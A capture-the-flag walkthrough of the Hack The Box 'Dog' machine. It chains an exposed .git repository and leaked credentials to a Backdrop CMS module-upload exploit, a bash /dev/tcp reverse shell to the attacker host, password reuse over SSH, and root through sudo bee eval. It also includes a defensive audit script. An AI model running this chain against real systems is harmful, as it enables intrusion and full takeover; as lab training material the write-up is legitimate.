Hack The Box / LINUX / 2025-07-12
Hack The Box — Dog (Linux)
Exposed Backdrop CMS source reveals credentials, module upload abuse gives web RCE, and sudo access to `bee` allows direct PHP command execution to root.
Target
- IP: 10.129.231.223
Recon
```bash
sudo nmap -sC -sV 10.129.231.223 -p- -T5 -v
```
```text
PORT      STATE    SERVICE VERSION
22/tcp    open     ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.12 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 97:2a:d2:2c:89:8a:d3:ed:4d:ac:00:d2:1e:87:49:a7 (RSA)
|   256 27:7c:3c:eb:0f:26:e9:62:59:0f:0f:b1:38:c9:ae:2b (ECDSA)
|_  256 93:88:47:4c:69:af:72:16:09:4c:ba:77:1e:3b:3b:eb (ED25519)
80/tcp    open     http    Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: Backdrop CMS 1 (https://backdropcms.org)
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-favicon: Unknown favicon MD5: 3836E83A3E835A26D789DDA9E78C5510
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-robots.txt: 22 disallowed entries (15 shown)
| /core/ /profiles/ /README.md /web.config /admin
| /comment/reply /filter/tips /node/add /search /user/register
|_/user/password /user/login /user/logout /?q=admin /?q=comment/reply
|_http-title: Home | Dog
| http-git:
|   10.129.231.223:80/.git/
|     Git repository found!
|     Repository description: Unnamed repository; edit this file 'description' to name the...
|_    Last commit message: todo: customize url aliases. reference:https://docs.backdro...
8160/tcp  filtered patrol
10470/tcp filtered unknown
10889/tcp filtered unknown
18651/tcp filtered unknown
24497/tcp filtered unknown
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```
Go to http://10.129.231.223/.
It says the site is Backdrop CMS.
From the posts we notice a user dogBackDropSystem.
On the About page we notice an email:
support@dog.htb
Add dog.htb to /etc/hosts.
From nmap output we see the .git directory is exposed.
Download git-dumper: https://github.com/arthaud/git-dumper
```bash
mkdir www
python3 git-dumper/git_dumper.py http://10.129.231.223/ www
cd www
code .
# ctrl+shift+f
```
Search for dog.htb.
We find:
tiffany@dog.htb
In core/includes/bootstrap.inc we find the version:
```php
define('BACKDROP_VERSION', '1.27.1');
```
In settings.php we find:
```php
$database = 'mysql://root:BackDropJ2024DS2024@127.0.0.1/backdrop';
```
Log in to Backdrop with email tiffany@dog.htb and password BackDropJ2024DS2024.
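The two findings above, a `.git` directory served from the web root and a database URL with an embedded password in `settings.php`, can be checked for on your own server before deployment. The audit below is an added example, not part of the original writeup; the names `audit_docroot` and `build_sample_tree` and the sample tree with its placeholder password are constructed for illustration.

```python
import os
import re
import tempfile

# Matches a DB URL with an embedded password, e.g. scheme://user:secret@host/db
DB_URL = re.compile(r"(\w+)://([^:/@\s'\"]+):([^@\s'\"]+)@([^/\s'\"]+)")

def audit_docroot(docroot):
    """Return findings for VCS metadata and embedded DB passwords under docroot."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(docroot):
        rel = os.path.relpath(dirpath, docroot)
        if ".git" in dirnames:
            # A .git directory below the web root is downloadable unless the
            # server is configured to deny it.
            findings.append(("vcs-metadata", os.path.normpath(os.path.join(rel, ".git")), ""))
            dirnames.remove(".git")  # do not descend into object storage
        for name in filenames:
            if not name.endswith((".php", ".inc")):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                for lineno, line in enumerate(fh, 1):
                    m = DB_URL.search(line)
                    if m:
                        # Report location and account only, never the secret itself.
                        redacted = f"{m.group(1)}://{m.group(2)}:***@{m.group(4)}"
                        findings.append(("embedded-db-password",
                                         f"{os.path.normpath(os.path.join(rel, name))}:{lineno}",
                                         redacted))
    return findings

def build_sample_tree(root):
    """Constructed sample docroot: a .git directory and a settings.php (placeholder password)."""
    os.makedirs(os.path.join(root, ".git", "objects"))
    with open(os.path.join(root, ".git", "HEAD"), "w") as fh:
        fh.write("ref: refs/heads/master\n")
    with open(os.path.join(root, "settings.php"), "w") as fh:
        fh.write("<?php\n$database = 'mysql://appuser:EXAMPLE-PASSWORD@127.0.0.1/backdrop';\n")
    with open(os.path.join(root, "index.php"), "w") as fh:
        fh.write("<?php echo 'home';\n")

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        for kind, where, detail in audit_docroot(tmp):
            print(kind, where, detail)
```

For the first finding, deploy from an export without VCS metadata or deny the path at the web server (for Apache 2.4, a `<DirectoryMatch>` block for `.git` with `Require all denied`).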
There is an exploit:
https://www.exploit-db.com/exploits/52021?utm_source=dlvr.it&utm_medium=twitter
Download and run it:
```bash
python3 52021.py http://10.129.231.223
```
It creates a file shell.zip.
Go to:
http://10.129.231.223/?q=admin/installer/manual
Click Upload a module, theme, or layout archive to install.
We can upload a file.
Upload shell.zip.
Click install.
An error appears; the system expects a .tar.gz file.
```bash
unzip shell.zip
tar -czvf shell.tar.gz shell
```
Now we get shell.tar.gz.
Upload shell.tar.gz and click install.
It should install.
Go to:
http://10.129.231.223/modules/shell/shell.php
We can execute commands.
Start a netcat listener:
```bash
nc -vlnp 4444
```
Execute this command:
```bash
bash -c 'bash -i >& /dev/tcp/10.10.14.3/4444 0>&1'
```
We get a reverse shell as www-data.
```bash
mysql -u root -h 127.0.0.1 -p
```
Enter password BackDropJ2024DS2024.
```sql
show databases;
```
We notice database backdrop.
```sql
use backdrop;
show tables;
```
We notice table users.
```sql
select * from users;
```
We get usernames and hashes.
Put them in a file named `hash`.
```bash
hashcat -a 0 ./hash ./rockyou.txt --username
```
It takes too long, so list the local users instead:
```text
www-data@dog:/var/log$ ls -l /home
total 8
drwxr-xr-x 4 jobert jobert 4096 Feb 7 15:59 jobert
drwxr-xr-x 3 johncusack johncusack 4096 Feb 7 15:59 johncusack
```
```bash
ssh johncusack@dog.htb
```
Use password BackDropJ2024DS2024 (the database password from settings.php).
```bash
sudo -l
```
```text
Matching Defaults entries for johncusack on dog:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User johncusack may run the following commands on dog:
    (ALL : ALL) /usr/local/bin/bee
```
```bash
file /usr/local/bin/bee
```
```text
/usr/local/bin/bee: symbolic link to /backdrop_tool/bee/bee.php
```
This is:
https://backdropcms.org/project/bee
```bash
sudo /usr/local/bin/bee --help
```
We can see available bee commands.
We can specify the Backdrop directory with --root.
We can execute PHP code with the eval command in bee.
Run:
```bash
sudo /usr/local/bin/bee --root=/var/www/html/ eval 'system("/bin/bash")'
```
We get a shell as root.